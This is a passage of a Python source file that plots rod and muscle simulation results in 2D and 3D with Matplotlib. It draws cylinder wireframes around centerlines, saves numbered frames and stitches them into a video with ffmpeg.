This is one possible solution to Matplotlib's\n ax.set_aspect('equal') and ax.axis('equal') not working for 3D.\n\n Input\n ax: a matplotlib axis, e.g., as output from plt.gca().\n\n Credits: https://stackoverflow.com/a/50664367\n \"\"\"\n if data is None:\n limits = np.array([axis.get_xlim3d(), axis.get_ylim3d(), axis.get_zlim3d()])\n else:\n limits = np.array(\n [\n [data[0, :].min(), data[0, :].max()],\n [data[1, :].min(), data[1, :].max()],\n [data[2, :].min(), data[2, :].max()],\n ]\n )\n\n origin = np.mean(limits, axis=1)\n radius = 0.5 * np.max(np.abs(limits[:, 1] - limits[:, 0]))\n axis.set_xlim3d([origin[0] - radius, origin[0] + radius])\n axis.set_ylim3d([origin[1] - radius, origin[1] + radius])\n axis.set_zlim3d([origin[2] - radius, origin[2] + radius])\n\n\ndef detect_files(input_folder, prefix, suffix):\n \"\"\" Detect all files in the input folder\n \"\"\"\n if not os.path.isdir(input_folder):\n raise FileNotFoundError(\"{} is not a valid folder\".format(input_folder))\n\n # Finds all files input_folder/prefix*.suffix\n import re\n\n # matches prefix__ (bignumber).suffix\n exp = r\"{prefix}[\\s_]*(\\d*){meta}{suffix}\".format(\n prefix=prefix, meta=\"\\\\\", suffix=suffix\n )\n compiled_regexp = re.compile(exp)\n\n matched_files = [f for f in os.listdir(input_folder) if compiled_regexp.search(f)]\n matched_files.sort()\n\n # Extract the filenumber as an integer\n try:\n file_tags = [int(compiled_regexp.match(f).group(1)) for f in matched_files]\n except ValueError:\n file_tags = []\n\n # Put the full address\n matched_files = [os.path.join(input_folder, f) for f in matched_files]\n\n # returns matched files and matched file numbers as strings\n return matched_files, file_tags\n\n\nclass Arrow3D(FancyArrowPatch):\n \"\"\"3D Arrow plot for drawing vector, from https://stackoverflow.com/a/22867877\"\"\"\n\n def __init__(self, xs, ys, zs, *args, **kwargs):\n FancyArrowPatch.__init__(self, (0, 0), (0, 0), *args, **kwargs)\n self._verts3d = xs, ys, zs\n\n def draw(self, renderer):\n xs3d, ys3d, zs3d = self._verts3d\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\n self.set_positions((xs[0], ys[0]), (xs[1], ys[1]))\n FancyArrowPatch.draw(self, renderer)\n\n\nclass CustomFormatter(\n argparse.RawDescriptionHelpFormatter, argparse.ArgumentDefaultsHelpFormatter\n):\n pass\n\n\nclass FigProperties: # pylint: disable=R0903\n width = 900\n height = 600\n dpi = 100\n\n @staticmethod\n def figsize():\n return (\n FigProperties.width / float(FigProperties.dpi),\n FigProperties.height / float(FigProperties.dpi),\n )\n\n\nclass DummyPlotter:\n \"\"\" Placeholder when we need to skip plotting\n \"\"\"\n\n # pylint: disable=R0913\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n pass\n\n def process(self):\n pass\n\n def plot(self, axis, data, color=(31 / 255, 119 / 255, 180 / 255)):\n pass\n\n def animate(self):\n pass\n\n\nclass ThreeDimensionalPlotter:\n \"\"\" Base class for all three-dimensional plotting\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n\n \"\"\" Figure attributes \"\"\"\n self.fig = plt.figure(figsize=FigProperties.figsize())\n\n self.ax = self.fig.add_subplot(111, projection=\"3d\")\n self.ax.w_xaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n self.ax.w_yaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n self.ax.w_zaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n self.ax.grid(True)\n self.ax.set_xlabel(\"X\")\n self.ax.set_ylabel(\"Y\")\n self.ax.set_zlabel(\"Z\")\n\n 
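# The rest of __init__ works out which source files still need rendering\n        # by diffing the file tags found in the input folder against the frames\n        # already written to the output folder (see the file search logic below).\n        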
\"\"\" Save file attributes \"\"\"\n self.output_folder = output_folder\n self.savefile_name, self.savefile_ext = os.path.splitext(save_file)\n self.display_flag = display_flag\n\n # Assume its a png if no extension given by default\n if not self.savefile_ext:\n self.savefile_ext = \".png\"\n\n \"\"\" Source file attributes and search \"\"\"\n # Guaranteed to be sorted\n ntypes_files = len(self.file_metadata)\n # Get a collection (list of lists) to store all the source files\n src_file_collection = [[] for i in range(ntypes_files)]\n src_filetag_collection = [[] for i in range(ntypes_files)]\n\n for index, (prefix, suffix, _) in enumerate(self.file_metadata):\n src_file_collection[index], src_filetag_collection[index] = detect_files(\n input_folder, prefix, suffix\n )\n\n for i, j in pairwise(range(ntypes_files)):\n # These lists are ordered and the default comparison should be fine\n assert (\n src_filetag_collection[i] == src_filetag_collection[j]\n ), \"Numbers don't match up\"\n\n # All collectinos are the same, pop only the last one\n src_filetags = src_filetag_collection.pop()\n\n tgt_files, tgt_filetags = detect_files(\n self.output_folder, self.savefile_name, self.savefile_ext\n )\n # print(input_folder, src_files, src_filetags)\n # print(output_folder, tgt_files, tgt_filetags)\n\n # If uses forces to clear all images, process all files\n if force_flag:\n self.files_to_be_processed = src_file_collection\n self.filetags_to_be_processed = src_filetags\n\n # Else, rewrite files that only need to be updated\n else:\n if len(tgt_filetags) > len(src_filetags):\n # if more targets already, then there's something fishy\n # act as if the force_flag is set\n self.files_to_be_processed = src_file_collection\n self.filetags_to_be_processed = src_filetags\n else:\n # Calculate difference between the filetags in src and tgt\n # if tgt is not empty\n\n # # Get indices of sort list, see https://stackoverflow.com/a/6423325\n # sort_src_indices = sorted(range(len(src_filetags))\n # ,key=src_filetags.__getitem__)\n # sort_srctags = [src_filetags[i] for i in sort_src_indices]\n # sort_tgttags = sorted(tgt_filetags)\n\n def index(a, x):\n \"\"\"Locate the leftmost value exactly equal to x in a sorted list\n See https://docs.python.org/3.7/library/bisect.html\n \"\"\"\n import bisect\n\n i = bisect.bisect_left(a, x)\n if i != len(a) and a[i] == x:\n return i\n return -1\n\n # If tgttags is empty, default to -1\n # else what is the next element beyond the last target tag?\n src_index = (\n -1 if not tgt_filetags else index(src_filetags, tgt_filetags[-1])\n )\n # print(src_index)\n\n self.files_to_be_processed = [\n sublist[src_index + 1 :] for sublist in src_file_collection\n ]\n self.filetags_to_be_processed = src_filetags[src_index + 1 :]\n\n # print(self.files_to_be_processed, self.filetags_to_be_processed)\n\n def process(self):\n \"\"\" Loads all data, plots them and stores them into appropriately\n named figures.\n \"\"\"\n\n # Load color metadata first as list of rgb tuples\n colors = [color for (_, _, color) in self.file_metadata]\n\n if self.display_flag:\n # Turn on interactive mode to persist figure\n plt.ion()\n # Show figure after persist\n plt.show()\n\n # From list of list (f) and list (g), get [f[i][0],f[i][1]] and g[i]\n for *src_file_names, src_file_tag in zip(\n *(self.files_to_be_processed), self.filetags_to_be_processed\n ):\n for i_seq, (src_file, color) in enumerate(zip(src_file_names, colors)):\n # Defaults loads to (ndata, 4) rather than (4,ndata)\n data = 
np.loadtxt(src_file).T\n self.plot(self.ax, data, color, i_seq)\n\n # self.ax.set_title(\"test at {}\".format(src_file_tag))\n self.fig.canvas.draw()\n\n if self.display_flag:\n plt.pause(0.001)\n\n # last column is source files\n # src_file_tag = src_file_info[-1]\n\n filename = \"{name}_{tag:05d}{ext}\".format(\n name=self.savefile_name, tag=src_file_tag, ext=self.savefile_ext\n )\n # tight bounding box here screws up the video\n self.fig.savefig(\n os.path.join(self.output_folder, filename), dpi=FigProperties.dpi\n )\n\n # # Show only the last drawn figure to the user\n # plt.show()\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_seq=None):\n \"\"\" Plots 3D data\n \"\"\"\n # https://stackoverflow.com/a/34486703\n # Plot centerline\n if len(ax.lines) > i_seq:\n ax.lines[i_seq]._verts3d = data[:3, :] # 0,1,2\n else:\n ax.plot(\n data[0, :],\n data[1, :],\n data[2, :],\n color=color,\n marker=\"o\",\n markersize=data[3, 0] * 0.2, # set marker based on radius\n linewidth=2.0,\n )\n\n pts_data, wire_data = calculate_cylinders(data)\n\n # Now plot wireframes\n # Each one adds two, so sequencing should reflect that\n if len(ax.collections) > 2 * i_seq:\n # First do pts_data\n ax.collections[2 * i_seq]._segments3d = convert_to_collection(pts_data)\n # Then do wire_data\n ax.collections[2 * i_seq + 1]._segments3d = convert_to_collection(wire_data)\n else:\n # first instance\n # transparency\n metadata = {\"colors\": color + (0.5,), \"linewidth\": 1.0}\n # ax.add_collection3d(convert_to_collection(pts_data, **metadata))\n ax.add_collection3d(\n Line3DCollection(convert_to_collection(pts_data), **metadata)\n )\n\n # transparency\n metadata = {\"colors\": color + (0.3,), \"linewidth\": 0.5}\n ax.add_collection3d(\n Line3DCollection(convert_to_collection(wire_data), **metadata)\n )\n\n # def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_seq=None):\n # \"\"\" Plots 3D data\n # \"\"\"\n # # https://stackoverflow.com/a/34486703\n # # Plot centerline\n # if ax.lines:\n # for line in ax.lines:\n # line._verts3d = data[:-1, :]\n # else:\n # ax.plot(\n # data[0, :],\n # data[1, :],\n # data[2, :],\n # color=color,\n # marker=\"o\",\n # linewidth=3.0,\n # )\n\n # pts_data, wire_data = calculate_cylinders(data)\n\n # # Now plot wireframes\n # if ax.collections:\n # # First do pts_data\n # ax.collections[0]._segments3d = convert_to_collection(pts_data)\n # # Then do wire_data\n # ax.collections[1]._segments3d = convert_to_collection(wire_data)\n # else:\n # # first instance\n # # transparency\n # metadata = {\"colors\": color + (1.0,), \"linewidth\": 2.0}\n # # ax.add_collection3d(convert_to_collection(pts_data, **metadata))\n # ax.add_collection3d(\n # Line3DCollection(convert_to_collection(pts_data), **metadata)\n # )\n\n # # # Add data to scatter\n # # ax.scatter(data[:, 0],\n # # data[:, 1],\n # # data[:, 2],\n # # color=colors[0],\n # # marker=\"o\")\n\n # # transparency\n # metadata = {\"colors\": color + (0.5,), \"linewidth\": 1.5}\n # ax.add_collection3d(\n # Line3DCollection(convert_to_collection(wire_data), **metadata)\n # )\n\n def animate(self):\n \"\"\" Animates using ffmpeg the figures created by savefig\n \"\"\"\n import subprocess\n\n # Test if ffmpeg present, else stop processing\n ret_code = subprocess.call([\"which\", \"ffmpeg\"])\n\n if ret_code != 0:\n raise OSError(\"ffmpeg not found. 
Aborting now.\")\n else:\n filenames = \"{frame}_%05d{ext}\".format(\n frame=os.path.join(self.output_folder, self.savefile_name),\n ext=self.savefile_ext,\n )\n\n # ffmpeg has its own glob matching facility\n subprocess.call(\n [\n \"ffmpeg\",\n \"-y\", # overwrites files\n \"-i\",\n filenames,\n \"-framerate\",\n \"30\",\n \"-crf\",\n \"24\",\n \"-pix_fmt\",\n \"yuv420p\",\n \"output_video.mp4\",\n ]\n )\n\n\ndef convert_to_collection(in_data, **kwargs):\n \"\"\" Converts a (3,*) np array into a MPL LineCollection\n \"\"\"\n ndims = in_data.shape[0]\n if ndims == 3:\n points = np.array([in_data[0], in_data[1], in_data[2]]).T.reshape(-1, 1, 3)\n segs = np.concatenate([points[:-1], points[1:]], axis=1)\n # return Line3DCollection(segs, **kwargs)\n elif ndims == 2:\n points = np.array([in_data[0], in_data[1]]).T.reshape(-1, 1, 2)\n segs = np.concatenate([points[:-1], points[1:]], axis=1)\n # return LineCollection(segs, **kwargs)\n else:\n raise IndexError(\"Dimensions incorrect!\")\n\n return segs\n\n\ndef calculate_cylinders(in_data):\n \"\"\" Calculates the cylinder coordinates given the centerline\n\n in_data : (n_dim + 1, N) in size, last dimension for radius\n \"\"\"\n\n # print(in_data.shape)\n # Split dimensions and radius\n data = in_data[:-2, :]\n # Last one is time now discounted\n radius_data = in_data[-2, :-1]\n n_dim = data.shape[0]\n\n # Governing parameters\n n_pts = data.shape[1]\n n_axial = 2\n n_theta = 20\n n_wireframe_skip = 5\n n_wireframe_skip = n_wireframe_skip if n_wireframe_skip < n_theta else 1\n\n \"\"\" 1. Calculate tangent \"\"\"\n tan = np.diff(data)\n\n # normalize\n mag_tan = norm(tan, ord=2, axis=0)\n tan /= mag_tan\n\n \"\"\" 2. Calculate normal and binormal \"\"\"\n # Guess for binormal, fair enough to assume in z\n binormal = np.array([0.0, 0.5, 0.5])\n binormal /= norm(binormal)\n\n # prepare to broadcast it to 2D\n binormal = binormal[:, np.newaxis]\n\n # make vector perpendicular to v\n normal = np.cross(tan, np.tile(binormal, (1, n_pts - 1)), axisa=0, axisb=0, axisc=0)\n # normalize\n mag_n = norm(normal, ord=2, axis=0)\n normal /= mag_n\n\n # make unit vector perpendicular to v and n1\n binormal = np.cross(tan, normal, axisa=0, axisb=0, axisc=0)\n\n # Stack normal and binormal together for (2,ndim,N-1)\n directors = np.vstack((binormal[np.newaxis, :, :], normal[np.newaxis, :, :]))\n\n \"\"\" 3. Parametrize angles and centerline \"\"\"\n # surface ranges over t from 0 to length of axis\n caxis = np.linspace(0.0, 1.0, n_axial)\n # polar angle varies from 0 to 2*pi\n theta = np.linspace(0, 2 * np.pi, n_theta)\n\n \"\"\" 4. 
Direct them\"\"\"\n # Idea here is to direct the centerline in the tangent direction\n # and direct the cross section in the norm-binorm direction\n # and then take a linear combination of both at every cross section\n\n # scale t up according to mag_tan, to give (n_axial, N-1) array\n # t = t.reshape(n_axial, 1) * mag_tan.reshape(1, -1)\n caxis = np.einsum(\"i,j->ij\", caxis, mag_tan)\n # Multiply by tangent to give a (ndim, n_axial, N-1) array, two ways\n # t = tan[:, np.newaxis, :] * t[np.newaxis, :, :]\n caxis = np.einsum(\"ik,jk->ijk\", tan, caxis)\n\n # calculate cossin first to give a (2, n_theta) array\n cs_theta = np.vstack((np.cos(theta), np.sin(theta)))\n # scale cs_theta up to give (2, n_theta, N-1) array\n cs_theta = np.tile(cs_theta[:, :, np.newaxis], (1, 1, n_pts - 1))\n # multiply by elemental cross section radius, retain shape\n cs_theta = np.einsum(\"ijk,k->ijk\", cs_theta, radius_data)\n # Multiply rcos and rsin by the appropriate normal, binorm\n # at every cross section & give (ndim, n_theta, N-1) array\n inplane = np.einsum(\"ijk,ilk->jlk\", directors, cs_theta)\n\n # Get coordinate data for all points on perimeter\n # according to x^p_i = x^node_i + t*tan_i + r*cos*bn_i + r*sin*n_i\n # data converted from 1 to n-1 as there are only (n-1) elements\n # Gives a (ndim, n_axial, n_theta, N-1) array\n perimeter_pts = (\n data[:, np.newaxis, np.newaxis, :-1]\n + caxis[:, :, np.newaxis, :]\n + inplane[:, np.newaxis, :, :]\n )\n # Gives only select angular lines running from start circle to end circle\n wireframe_pts = perimeter_pts[:, [0, -1], ::n_wireframe_skip, :]\n # Note : here it is important to reshape perimeter pts to have\n # a sense of continuity in the azimuthal position\n # this is not important for the wireframe however\n return perimeter_pts.reshape(n_dim, n_axial * n_theta, -1), wireframe_pts\n\n\nclass SphericalJointPlotter(ThreeDimensionalPlotter):\n \"\"\" Plots the trajectory of the slithering sphericalJoint\n as simulation progresses\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n\n # # Body and wireframe color\n # self.file_metadata = [\n # (\"rod1\", \".txt\", (31 / 255, 119 / 255, 180 / 255)),\n # (\"rod2\", \".txt\", (200 / 255, 0 / 255, 0 / 255)),\n # ]\n\n # Body and wireframe color\n self.file_metadata = [\n (\"rod1\", \".txt\", to_rgb(\"xkcd:bluish\")),\n (\"rod2\", \".txt\", to_rgb(\"xkcd:reddish\")),\n ]\n\n super(SphericalJointPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n self.ax.set_xlim(-200, 200)\n self.ax.set_ylim(-150, 250)\n self.ax.set_zlim(00, 400)\n # self.ax.set_ylim(-0.125, 0.125)\n # self.ax.set_zlim(-0.2, 0.2)\n set_axes_equal(self.ax)\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_seq=None):\n super(SphericalJointPlotter, self).plot(ax, data, color, i_seq)\n last_pos = data[0:3, -1] # position\n time = data[4, 0] # time\n scaling = 60.0 # purely for visualization\n\n # Below routine for plotting force as a line, and not arrow\n\n # # After the last possible dynamic update plot\n # if i_seq == 1: # ie. 
i_seq == len(self.metadata)-1\n # if len(ax.lines) > i_seq + 1: # 2 * i_seq + 2\n # if time > 0.2:\n # f = 1.0 * np.array(\n # [\n # np.cos(0.5 * np.pi * (time - 0.2)),\n # 0.0,\n # np.sin(0.5 * np.pi * (time - 0.2)),\n # ]\n # )\n # else: # time < 0.2, only update in position is needed\n # f = np.array([0.0, 0.0, -2])\n\n # f_with_pos = np.vstack((last_pos, last_pos + scaling * f)).T\n # ax.lines[i_seq + 1]._verts3d = f_with_pos\n # else:\n # f = scaling * np.array([0.0, 0.0, -2])\n # f_with_pos = np.vstack((last_pos, last_pos + f)).T\n # ax.plot(\n # f_with_pos[0, :],\n # f_with_pos[1, :],\n # f_with_pos[2, :],\n # color=\"k\",\n # linewidth=1,\n # )\n\n # After the last possible dynamic update plot\n if i_seq == 1: # i.e. i_seq == len(self.metadata)-1\n if ax.artists:\n if time > 0.2:\n f = 1.0 * np.array(\n [\n np.cos(0.5 * np.pi * (time - 0.2)),\n 0.0,\n np.sin(0.5 * np.pi * (time - 0.2)),\n ]\n )\n else: # time < 0.2, only update in position is needed\n f = np.array([0.0, 0.0, -2])\n arrow_end_pos = last_pos + scaling * f\n\n ax.artists[0]._verts3d = np.vstack((last_pos, arrow_end_pos)).T\n else:\n f = np.array([0.0, 0.0, -2])\n arrow_end_pos = last_pos + scaling * f\n a = Arrow3D(\n [last_pos[0], arrow_end_pos[0]],\n [last_pos[1], arrow_end_pos[1]],\n [last_pos[2], arrow_end_pos[2]],\n mutation_scale=10,\n lw=1,\n arrowstyle=\"-|>\",\n color=\"k\",\n )\n ax.add_artist(a)\n\n\nclass HingeJointPlotter(SphericalJointPlotter):\n \"\"\" Plots the trajectory of the hinge joint\n as simulation progresses\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n super(HingeJointPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Overrides changes\n self.ax.set_xlim(-200, 200)\n self.ax.set_ylim(-150, 250)\n self.ax.set_zlim(00, 400)\n set_axes_equal(self.ax)\n\n\nclass FixedJointPlotter(SphericalJointPlotter):\n \"\"\" Plots the trajectory of the fixed joint\n as simulation progresses\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n super(FixedJointPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # # Overrides changes\n # self.ax.set_xlim(-50, 50)\n # self.ax.set_ylim(-150, 250)\n # self.ax.set_zlim(300, 400)\n # set_axes_equal(self.ax)\n\n\nclass PullingMusclePlotter(ThreeDimensionalPlotter):\n \"\"\" Plots the trajectory of the pulling muscle\n as simulation progresses\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # Body and wireframe color\n self.file_metadata = [\n # (\"rod1\", \".txt\", (31 / 255, 119 / 255, 180 / 255)),\n (\"rod1\", \".txt\", to_rgb(\"xkcd:bluish\")),\n # (\"rod2\", \".txt\", (200 / 255, 0 / 255, 0 / 255)),\n (\"rod2\", \".txt\", to_rgb(\"xkcd:reddish\")),\n # (\"rod3\", \".txt\", (50 / 255, 200 / 255, 80 / 255)),\n (\"rod3\", \".txt\", to_rgb(\"xkcd:greenish\")),\n ]\n\n super(PullingMusclePlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n self.ax.set_xlim(-50, 50)\n self.ax.set_ylim(-100, 200)\n self.ax.set_zlim(50, 350)\n # self.ax.set_ylim(-0.125, 0.125)\n # self.ax.set_zlim(-0.2, 0.2)\n set_axes_equal(self.ax)\n\n\nclass SnakePlotter(ThreeDimensionalPlotter):\n \"\"\" Plots the trajectory of the slithering snake\n as simulation progresses\n 
\"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # Body and wireframe color\n self.file_metadata = [(\"rod1\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n super(SnakePlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n self.ax.set_xlim(-3, 0.8)\n self.ax.set_ylim(-0.25, 0.25)\n self.ax.set_zlim(-0.05, 0.05)\n set_axes_equal(self.ax)\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_seq=None):\n super(SnakePlotter, self).plot(ax, data, color, i_seq)\n\n # After the last possible dynamic update plot\n if i_seq == 0: # ie. i_seq == len(self.metadata)-1\n if len(ax.collections) > 2: # 2 * i_seq + 2\n # surfae alrady plotted, why plot it again?\n pass\n else:\n # * unpakcs arguments\n x = np.linspace(*ax.get_xlim(), 7)\n y = np.linspace(*ax.get_ylim(), 7)\n X, Y = np.meshgrid(x, y)\n Z = 0.0 * X\n ax.grid(False)\n ax.plot_wireframe(\n X, Y, Z, rstride=1, cstride=1, color=\"darkgrey\", linewidth=1\n )\n\n # def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255)):\n # \"\"\" Plots snake data\n # \"\"\"\n # super(SnakePlotter, self).plot(ax, data, color)\n\n # # self.ax.set_xlim(0, 0.125)\n # # self.ax.set_ylim(-0.125, 0.125)\n # # self.ax.set_zlim(-0.2, 0.2)\n # set_axes_equal(self.ax)\n\n\nclass HelicalBucklingPlotter(ThreeDimensionalPlotter):\n \"\"\" Plots the trajectory of the slithering snake\n as simulation progresses\n \"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # Body and wireframe color\n self.file_metadata = [(\"rod1\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n super(HelicalBucklingPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n # self.ax.set_xlim(-3, 0.8)\n # self.ax.set_ylim(-0.25, 0.25)\n self.ax.set_zlim(-50.0, 50.0)\n set_axes_equal(self.ax)\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_seq=None):\n super(HelicalBucklingPlotter, self).plot(ax, data, color, i_seq)\n\n\nclass TwoDimensionalPlotter:\n \"\"\" Plot class for classical 2D line plots\"\"\"\n\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n\n \"\"\" Figure attributes \"\"\"\n self.fig = plt.figure(figsize=FigProperties.figsize())\n\n if not hasattr(self, \"file_metadata\"):\n # print(\"hi\")\n # if self.file_metadata is None:\n self.file_metadata = [(\"Flagella\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n # Also total number of suplots\n ntypes_files = len(self.file_metadata)\n # Number of rows dependent\n n_rows = 1 if ntypes_files < 4 else 2\n # Number of columns,\n n_columns = ntypes_files // n_rows\n n_columns += ntypes_files % n_rows\n\n # Create a Position index\n pindex = range(1, ntypes_files + 1)\n\n # Create a bunch of axes\n self.axes = [self.fig.add_subplot(n_rows, n_columns, k) for k in pindex]\n\n # Set some common attributes\n for axis in self.axes:\n axis.grid(True)\n # ax.w_xaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n\n \"\"\" Save file attributes \"\"\"\n self.output_folder = output_folder\n self.savefile_name, self.savefile_ext = os.path.splitext(save_file)\n\n # Assume its a pdf if no extension given by default\n if not self.savefile_ext:\n self.savefile_ext = \".pdf\"\n\n \"\"\" Source file attributes and search \"\"\"\n\n # Guaranteed to be sorted\n 
self.files_to_be_processed = [None for i in range(ntypes_files)]\n for index, (prefix, suffix, _) in enumerate(self.file_metadata):\n temp, _ = detect_files(input_folder, prefix, suffix)\n self.files_to_be_processed[index] = temp.pop()\n\n self.force_flag = force_flag\n self.display_flag = display_flag\n\n print(\"{} initialized\".format(type(self).__name__))\n\n def process(self):\n \"\"\" Loads all data, plots them and stores them into appropriately\n named figures.\n \"\"\"\n\n # Load color metadata first as list of rgb tuples\n colors = [color for (_, _, color) in self.file_metadata]\n\n if self.display_flag:\n # Turn on interactive mode to persist figure\n plt.ion()\n # Show figure after persist\n plt.show()\n\n print(\"Starting processing, press Ctrl+C to quit at any time\")\n print(\"(Maybe more than once)\")\n while True:\n try:\n for i_ax, (src_file, axis, color) in enumerate(\n zip(self.files_to_be_processed, self.axes, colors)\n ):\n # Defaults loads to (ndata, 4) rather than (4,ndata)\n data = np.loadtxt(src_file).T\n self.plot(axis, data, color, i_ax)\n\n # Autoscaling important as we dynamically update now\n axis.relim()\n axis.autoscale_view(True, True, True)\n\n self.fig.canvas.draw()\n\n filename = \"{name}{ext}\".format(\n name=self.savefile_name, ext=self.savefile_ext\n )\n\n self.fig.savefig(\n os.path.join(self.output_folder, filename), dpi=FigProperties.dpi\n )\n\n if self.display_flag:\n # Bigger pause to prevent too much looping\n plt.pause(2.0)\n else:\n pass\n\n except KeyboardInterrupt:\n print(\"Finished processing\")\n raise IOError\n\n # if self.display_flag:\n # # Show only the last drawn figure to the user\n # plt.show()\n\n def plot(self, axis, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots snake data\n \"\"\"\n if axis.lines:\n for line in axis.lines:\n line.set_data(data[0, :], data[1, :])\n else:\n axis.plot(data[0, :], data[1, :], color=color, marker=\"o\", linewidth=2)\n # axis.plot(data[0, :], data[1, :], color=color, marker=\"o\", linewidth=2)\n\n def animate(self):\n \"\"\" Animates using ffmpeg the figures created by savefig\n \"\"\"\n pass\n\n\nclass TimoshenkoPlotter(TwoDimensionalPlotter):\n \"\"\"Plots flagella quantities\"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n self.file_metadata = [(\"timoshenko_final_shape\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n super(TimoshenkoPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Setting labels here\n self.axes[0].set_xlabel(\"X (m)\")\n self.axes[0].set_ylabel(\"Y (m)\")\n self.axes[0].set_title(\"Centerline deflection\")\n\n print(\"TimoshenkoPlotter initialized!\")\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots timoshenko data\n \"\"\"\n # Timoshenko data needs correction with the first instant\n ax.plot(\n data[0, :],\n data[1, :],\n color=color,\n marker=\"o\",\n linewidth=2,\n label=\"simulation\",\n )\n ax.plot(\n data[3, :],\n data[4, :],\n color=\"k\",\n linestyle=\"dashed\",\n linewidth=2,\n label=\"analytical\",\n )\n ax.legend()\n\n # In this case as soon as we plot, we can exit\n plt.pause(10.0)\n import sys\n\n sys.exit(0)\n\n\nclass ElbowPlotter(TwoDimensionalPlotter):\n \"\"\" Plots the muscle force output of the elbow\n as simulation progresses\n \"\"\"\n\n # pylint : disable=too-many-arguments\n def __init__(\n self, 
input_folder, output_folder, save_file, force_flag, display_flag\n ):\n # pylint : enable=too-many-arguments\n\n self.file_metadata = [(\"velocity\", \".txt\", to_rgb(\"xkcd:bluish\"))]\n\n super(ElbowPlotter, self).__init__(\n input_folder, output_folder, save_file, force_flag, display_flag\n )\n\n # Make any other changes to the figure here\n # Data-dependent maybe\n\n # Setting labels here\n self.axes[0].set_xlabel(\"T (s)\")\n self.axes[0].set_ylabel(\"Elbow angle (degrees)\")\n self.axes[0].set_title(\"Angle vs T\")\n\n # self.ax.set_xlim(0, 1)\n # self.ax.set_ylim(0, 1)\n\n def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n \"\"\" Plots elbow data\n \"\"\"\n # Flagella data needs correction with the first instant\n time = data[0, :]\n angle = data[1, :] * 180.0 / np.pi\n # print(time, pos)\n\n if ax.lines:\n for line in ax.lines:\n line.set_data(time, angle)\n else:\n ax.plot(time, angle, color=color, marker=\"o\", linewidth=2)\n\n\n# class SnakeVelocityPlotter(TwoDimensionalPlotter):\n# \"\"\" Plots the muscle force output of the elbow\n# as simulation progresses\n# \"\"\"\n\n# # pylint : disable=too-many-arguments\n# def __init__(\n# self, input_folder, output_folder, save_file, force_flag, display_flag\n# ):\n# # pylint : enable=too-many-arguments\n\n# # self.file_metadata = [(\"velocity\", \".txt\", (31 / 255, 119 / 255, 180 / 255))]\n\n# super(SnakeVelocityPlotter, self).__init__(\n# input_folder, output_folder, save_file, force_flag, display_flag\n# )\n\n# # Make any other changes to the figure here\n# # Data-dependent maybe\n\n# # Setting labels here\n# self.axes[0].set_xlabel(\"T (s)\")\n# self.axes[0].set_ylabel(\"Velocity (m/s)\")\n# self.axes[0].set_title(\"Velocity vs T\")\n\n# # self.ax.set_xlim(0, 1)\n# # self.ax.set_ylim(0, 1)\n\n# def plot(self, ax, data, color=(31 / 255, 119 / 255, 180 / 255), i_ax=None):\n# \"\"\" Plots muscularsnake data\n# \"\"\"\n# # Muscularsnake data plotted from the second instant\n# # The first instant is just the initialization which is\n# # discarded to give time for the structure to relax (ie contact etc.)\n\n# # Muscularsnake data plotted with reference to the second instant\n# # The first is initial time\n# time = data[0, :]\n# x_velocity = data[3, :]\n# y_velocity = data[4, :]\n\n# velocity_dir = np.array([-2.385, -0.089])\n# velocity_dir /= norm(velocity_dir)\n\n# fwd_velocity = x_velocity * velocity_dir[0] + y_velocity * velocity_dir[1]\n\n# binorm = np.array([0.089, -2.385])\n# binorm /= norm(binorm)\n\n# lat_velocity = x_velocity * binorm[0] + y_velocity * binorm[1]\n# mag_vel_new = fwd_velocity**2 + lat_velocity**2\n# mag_vel_orig = x_velocity**2 + y_velocity**2\n\n# if ax.lines:\n# ax.lines[0].set_data(time, -fwd_velocity)\n# ax.lines[1].set_data(time, lat_velocity)\n# # ax.lines[0].set_data(time, 